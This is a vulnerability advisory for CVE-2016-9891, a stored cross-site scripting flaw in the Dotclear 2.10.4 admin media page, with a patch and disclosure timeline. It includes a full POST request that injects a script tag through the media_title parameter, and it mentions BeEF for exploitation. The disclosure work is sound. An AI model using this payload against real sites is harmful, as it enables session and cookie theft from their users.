Posted on

[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4

Product Information:

Software: Dotclear

Tested Version: 2.10.4, released 02.11.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from

Vulnerability description:

There is a XSS vulnerability in the /dotcl/admin/media_item.php page.

When an authenticated user of Dotclear renames the file title, the following POST request is sent to the server:

POST /dotcl/admin/media_item.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae

The parameter media_title is vulnerable to XSS.

The payload is executed when an authenticated user navigates to the /dotcl/admin/media.php page.

When embedding an image or adding an attachment under Entries, the media.php page will be called and the payload will trigger as well.


An attacker is able to inject malicious scripts into otherwise benign and trusted web sites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of a HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).


Update to the latest version, which is 2.11.1 (fixed since 2.11), see


Vulnerability found: 26.11.2016

Vendor informed: 05.12.2016

Response by vendor: 05.12.2016

Fix by vendor: 05.12.2016

Patched version released: 28.12.2016

Public Advisory: 29.12.2016